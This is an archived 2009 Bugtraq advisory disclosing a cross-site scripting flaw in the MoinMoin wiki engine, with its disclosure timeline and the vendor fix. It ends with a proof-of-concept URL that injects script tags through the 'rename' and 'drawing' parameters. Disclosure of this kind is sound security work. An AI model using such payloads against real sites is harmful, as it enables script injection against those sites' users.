| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <200901201625.n0KGPWKE026171@www3.securityfocus.com>
Date: Tue, 20 Jan 2009 09:25:32 -0700
From: swhite@...urestate.com
To: bugtraq@...urityfocus.com
Subject: MoinMoin Wiki Engine XSS Vulnerability
MoinMoin Wiki Engine Cross-Site Scripting
Discovered by: SecureState R&D Team (sasquatch)
Website: www.securestate.com
Discovered: 01-08-09
Vendor Notified: 01-08-09
Vendor Fix Issued: 01-11-09 (http://hg.moinmo.in/moin/1.8/rev/8cb4d34ccbc1)
Vendor Fix: Upgrade to version 1.8.1
Public Posting: 01-19-09
Example:
http://moinmo.in/moinmoin/WikiSandBox?rename="><script>alert('rename xss')</script>&action=AttachFile&drawing="><script>alert('drawing xss')</script>